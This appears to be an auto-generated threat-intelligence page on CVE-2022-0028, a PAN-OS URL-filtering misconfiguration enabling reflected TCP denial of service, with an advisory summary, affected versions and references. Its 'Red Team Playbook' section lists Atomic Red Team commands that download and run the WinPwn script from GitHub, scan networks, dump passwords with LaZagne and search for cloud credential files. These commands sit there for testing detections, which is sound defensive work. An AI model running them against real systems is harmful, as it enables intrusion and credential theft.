CVE-2022-0028
Overview
This vulnerability is a reflected and amplified TCP denial-of-service (RDoS) condition caused by a misconfiguration in the PAN-OS URL filtering policy. The root cause lies in assigning a URL filtering profile with blocked categories to a source zone that has an external-facing interface, which triggers the firewall to reflect and amplify TCP traffic. The affected components include Palo Alto Networks PA-Series, VM-Series, and CN-Series firewalls running PAN-OS with URL filtering enabled in this specific configuration.
Vulnerability Description
A PAN-OS URL filtering policy misconfiguration could allow a network-based attacker to conduct reflected and amplified TCP denial-of-service (RDoS) attacks. The DoS attack would appear to originate from a Palo Alto Networks PA-Series (hardware), VM-Series (virtual) and CN-Series (container) firewall against an attacker-specified target. To be misused by an external attacker, the firewall configuration must have a URL filtering profile with one or more blocked categories assigned to a source zone that has an external facing interface. This configuration is not typical for URL filtering and, if set, is likely unintended by the administrator. If exploited, this issue would not impact the confidentiality, integrity, or availability of our products. However, the resulting denial-of-service (DoS) attack may help obfuscate the identity of the attacker and implicate the firewall as the source of the attack. We have taken prompt action to address this issue in our PAN-OS software. All software updates for this issue are expected to be released no later than the week of August 15, 2022. This issue does not impact Panorama M-Series or Panorama virtual appliances. This issue has been resolved for all Cloud NGFW and Prisma Access customers and no additional action is required from them.
Impact
An unauthenticated external attacker can exploit this vulnerability to conduct reflected and amplified TCP denial-of-service attacks against arbitrary targets, causing service disruption. The attack traffic appears to originate from the affected Palo Alto Networks firewall, potentially implicating the device as the source of the attack. No direct compromise of the firewall's confidentiality, integrity, or availability occurs, but the resulting denial-of-service can obscure the attacker's identity and disrupt network operations for the targeted systems. No user interaction or authentication is required to exploit this condition.
Solution
Palo Alto Networks has addressed this issue in PAN-OS software updates released by the week of August 15, 2022. The fix applies to all affected PA-Series, VM-Series, and CN-Series firewalls. Cloud NGFW and Prisma Access customers have already received resolutions and require no further action. Administrators should consult the official Palo Alto Networks security advisory at https://security.paloaltonetworks.com/CVE-2022-0028 for detailed patch instructions and ensure their devices are updated to the fixed PAN-OS versions.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with misconfigured URL filtering policies in PAN-OS presents a significant risk to network security. Specifically, this issue arises when an external-facing interface is assigned a URL filtering profile that includes blocked categories. This atypical configuration can be exploited by attackers to launch reflected and amplified TCP denial-of-service (RDoS) attacks. In such scenarios, the firewall acts as an unwitting participant, forwarding malicious traffic to a target while masking the true source of the attack. The potential for this misconfiguration to occur inadvertently highlights the importance of proper firewall management and configuration oversight.
Attack vectors for this vulnerability primarily involve external attackers who can leverage the misconfigured firewall to direct traffic towards a victim. By exploiting the URL filtering policy, an attacker can initiate a denial-of-service attack that appears to originate from the firewall itself. This not only obfuscates the attacker's identity but also implicates the firewall in the attack, potentially damaging the reputation of the organization that owns the firewall. The exploitation of this vulnerability does not compromise the confidentiality or integrity of the affected systems; however, the resulting denial-of-service attack can severely disrupt services for the targeted entity, leading to significant operational challenges.
The real-world impact of this vulnerability can be profound, particularly for organizations that rely heavily on their network infrastructure for business operations. A successful denial-of-service attack can lead to downtime, loss of revenue, and damage to customer trust. Additionally, the misattribution of the attack to the firewall can lead to unnecessary scrutiny and investigation, diverting resources away from more critical security concerns. Organizations may also face regulatory repercussions if they are found to be negligent in their firewall configurations, further compounding the business risks associated with this vulnerability.
To detect and mitigate the risks associated with this vulnerability, organizations should implement a robust configuration management process for their firewalls. Regular audits of firewall settings, particularly those related to URL filtering policies, can help identify and rectify misconfigurations before they can be exploited. Employing automated tools that monitor configuration changes and alert administrators to potential security risks can enhance an organization’s ability to maintain secure firewall settings. Additionally, organizations should ensure that they keep their PAN-OS software up to date, as the vendor has released patches to address this issue. By prioritizing these strategies, organizations can significantly reduce their exposure to this type of denial-of-service attack.
In conclusion, the misconfiguration of URL filtering policies in PAN-OS presents a notable threat to network security, enabling attackers to exploit firewalls for denial-of-service attacks. The implications of such exploitation can lead to significant operational disruptions and reputational damage for affected organizations. Through diligent configuration management, regular audits, and timely software updates, organizations can effectively mitigate the risks associated with this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in activity related to CVE-2022-0028, with our telemetry indicating the initial emergence of exploitation attempts targeting misconfigured PAN-OS URL filtering policies. Although the EPSS score has declined significantly, reflecting a reduced overall likelihood of widespread exploitation, the appearance of new triggers signals that threat actors are actively probing vulnerable environments. This development underscores the persistence of adversaries seeking to leverage reflected and amplified TCP denial-of-service vectors via Palo Alto Networks firewalls. For defenders, this shift highlights the necessity of heightened vigilance and monitoring for anomalous traffic patterns consistent with RDoS tactics. While no new exploit variants or ransomware associations have been identified, the increased detection activity elevates the operational risk, warranting a reassessment of exposure and defensive postures to this vulnerability.
Affected Products (16)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | All |
cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 8.1.23 |
cpe:2.3:o:paloaltonetworks:pan-os:8.1.23:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 9.0.16 |
cpe:2.3:o:paloaltonetworks:pan-os:9.0.16:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 9.0.16 |
cpe:2.3:o:paloaltonetworks:pan-os:9.0.16:h2:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 9.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:9.1.14:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 9.1.14 |
cpe:2.3:o:paloaltonetworks:pan-os:9.1.14:h1:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.0.11 |
cpe:2.3:o:paloaltonetworks:pan-os:10.0.11:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.6 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.6:*:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.1.6 |
cpe:2.3:o:paloaltonetworks:pan-os:10.1.6:h3:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:-:*:*:*:*:*:*
|
|
|
Paloaltonetworks | Pan-Os | 10.2.2 |
cpe:2.3:o:paloaltonetworks:pan-os:10.2.2:h1:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
3 eventsSighting activity recorded
Sighting activity recorded
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns
No CAPEC pattern mapped to this CVE.
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2022-0028 |
| security.paloaltonetworks.com |
GitHub CVE
x_refsource_MISC
|
https://security.paloaltonetworks.com/CVE-2022-0028 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2022-0028 |